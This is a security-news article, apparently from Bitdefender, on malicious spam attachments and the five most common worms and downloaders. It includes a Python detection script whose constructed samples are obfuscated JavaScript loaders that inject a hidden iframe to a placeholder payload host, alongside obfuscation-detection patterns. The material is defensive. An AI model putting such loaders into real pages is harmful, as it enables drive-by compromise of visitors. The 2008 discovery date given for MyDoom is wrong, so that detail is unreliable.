
Spam with Malicious Attachments Rising

While the volume of spam messages is falling, the number of messages containing malicious attachments has increased, meaning that spam is growing more dangerous even as it becomes less prevalent, according to a Bitdefender study.

The number of malicious attachments in January of this year rose 4 percent from the same period of last year, even as the overall number of spam messages sent dropped by more than 16 percent in the first quarter of 2012 from the last quarter of 2011, Bitdefender research shows. Of the 264.6 billion spam messages sent daily, 1.14% carry attachments – about 300 million of which are malicious.

After increasing in January, the growth of malicious attachments leveled off amid an apparent pause in spam campaigns even though spam continued to fall overall. Attachments may come in the form of phishing forms that trick users into typing in credit card credentials for scammers to use whenever they want. Or they may pack malware such as Trojans, worms and viruses that can eventually cause trouble to innocent users.

As this type of attachment has become a growing concern around the web, Bitdefender wanted to see exactly which pieces of malware end up in users’ inboxes. Here are the top five most interesting and frequent malware samples attached to spam e-mails:

First discovered in 2008, MyDoom, a mass-mailing worm, continues to be among the most persistent pieces of malware to reach users’ inboxes. After the skillfully social-engineered e-mails convince the user to open the attachment, the worm sends itself to all e-mail addresses found on that system, using a variety of senders, subject lines and body text samples.

MyDoom also drops a backdoor component on the host system to grant a remote attacker full access to the user’s computer. It also updates a list of infected IP addresses on a remote server. This way, every compromised system is listed in a common database of infected computers accessible to the worm. MyDoom is known to be used in denial-of-service attacks against the sites of antivirus and software-producing companies.

The second most widely spread malicious attachment is a generic JavaScript downloader that comes in the form of obfuscated JavaScript inside an HTML attachment. When the user opens the attached HTML file, the obfuscated JavaScript runs and injects an iframe into the same HTML page it resides in. This iframe loads malicious content from third-party servers, which results in system compromise.
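As an added illustration of the triage a mail gateway or an analyst might apply to HTML attachments of the kind described above (example code written for this page, not Bitdefender's tooling), the script below statically peels the two cheapest encodings such downloaders tend to use, percent-escaped strings handed to unescape() and String.fromCharCode() number lists, and flags an attachment whose script materialises an iframe that is absent from the static markup. The sample attachments and the hostname payload.example.invalid are constructed for the example.

```python
"""Static triage of an HTML e-mail attachment for script-generated iframes.

Added example, not code from the original article. The sample attachments
below are constructed; payload.example.invalid is a placeholder host.
"""
import re
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
# Zero-sized or invisible frames are the usual way a loader hides its iframe.
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*[\"']?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# A quoted string made entirely of %XX escapes (at least four of them).
PERCENT_STR_RE = re.compile(r"[\"']((?:%[0-9a-fA-F]{2}){4,})[\"']")
CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromcharcode", "document.write(", "atob(")


def decode_layers(script: str, max_rounds: int = 5) -> str:
    """Replace simple encoded literals with their decoded text, repeatedly,
    so that a payload wrapped in several cheap layers becomes visible."""
    current = script
    for _ in range(max_rounds):
        decoded = PERCENT_STR_RE.sub(lambda m: unquote(m.group(1)), current)
        decoded = CHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).replace(" ", "").split(",") if n),
            decoded)
        if decoded == current:  # nothing left to peel
            break
        current = decoded
    return current


def scan_html_attachment(html: str) -> dict:
    """Return a verdict plus the indicators and iframe sources found."""
    indicators = set()
    scripts = SCRIPT_RE.findall(html)
    static_html = SCRIPT_RE.sub("", html)
    iframes = IFRAME_RE.findall(static_html)  # frames present in plain markup
    if scripts:
        indicators.add("inline_script")
    for body in scripts:
        if any(marker in body.lower() for marker in OBFUSCATION_MARKERS):
            indicators.add("obfuscation_markers")
        generated = IFRAME_RE.findall(decode_layers(body))
        if generated:  # an iframe that only exists once the script is decoded
            indicators.add("script_generated_iframe")
            iframes.extend(generated)
    if any(HIDDEN_RE.search(tag) for tag in iframes):
        indicators.add("hidden_iframe")
    srcs = [m.group(1) for tag in iframes for m in [SRC_RE.search(tag)] if m]
    if "script_generated_iframe" in indicators:
        verdict = "likely_malicious"
    elif indicators & {"obfuscation_markers", "hidden_iframe"}:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": sorted(indicators), "iframe_srcs": srcs}


# --- constructed sample attachments -------------------------------------
def _fully_escaped(text: str) -> str:
    """Percent-escape every character, as the loaders' unescape() strings do."""
    return "".join("%%%02X" % ord(ch) for ch in text)


_INJECTED = ('<iframe src="http://payload.example.invalid/landing" '
             'width="0" height="0"></iframe>')

SAMPLE_BENIGN = ("<html><body><h1>Monthly newsletter</h1><p>Thanks for reading.</p>"
                 '<a href="https://example.invalid/unsubscribe">Unsubscribe</a></body></html>')

SAMPLE_UNESCAPE = ("<html><body><p>Your invoice is attached.</p><script>"
                   "var p=unescape('" + _fully_escaped(_INJECTED) + "');document.write(p);"
                   "</script></body></html>")

SAMPLE_CHARCODE = ("<html><body><p>Delivery notice</p><script>document.write("
                   "String.fromCharCode(" + ",".join(str(ord(c)) for c in _INJECTED) + "));"
                   "</script></body></html>")

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("unescape", SAMPLE_UNESCAPE),
                         ("charcode", SAMPLE_CHARCODE)):
        print(name, scan_html_attachment(sample))
```

The decoder is deliberately not a JavaScript interpreter: it only rewrites literal encodings, so a loader that builds its string at runtime will still be caught by the obfuscation markers and land in the "suspicious" bucket rather than slipping through as clean. In a gateway, that bucket is the one to detonate in a sandbox or quarantine.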

Ranking third is Netsky, a mass mailer like MyDoom that, apart from sending itself to all e-mail addresses found on the compromised system, also spreads via FTP, P2P or shared files. The crafty subject lines range from accusations and error messages to love declarations or money transactions, and include celebrity names to make them more appealing to the victim. If the user opens the attachment, the worm displays a message (made to look as though it comes from the locally installed AV solution) saying that no virus was found on the system. Another peculiarity is that Netsky never sends itself to e-mail addresses containing words related to the security and antivirus industry (@antivirus, @FBI, @freeav, bitdefender, etc.).

In fourth place is Mytob, a worm known to prevent users from connecting to the sites of a multitude of security solution vendors while opening a backdoor to allow access to ill-intentioned remote intruders. This way the system is open to any sort of malicious exploitation.

The Bagle worm comes in fifth, as a mass mailer gathering addresses and sending itself to all e-mail addresses it stumbles upon on the compromised system. It also downloads further addresses from an embedded list of online locations. To pass undetected it terminates processes, mostly those belonging to locally installed anti-virus solutions. It then downloads and executes files from numerous dubious websites.

This article is based on the technical information provided courtesy of Doina Cosovan, Bitdefender Virus Analyst and Bitdefender Anti-Spam Lab.

All product and company names mentioned herein are for identification purposes only and are the property of, and may be trademarks of, their respective owners.


About the author

Loredana BOTEZATU

A blend of teacher and technical journalist with a pinch of e-threat analysis, Loredana Botezatu writes mostly about malware and spam. She believes that most errors happen between the keyboard and the chair. Loredana has been writing about the IT world and e-security for well over five years and has made a personal goal out of educating computer users about the ins and outs of the cybercrime ecosystem.
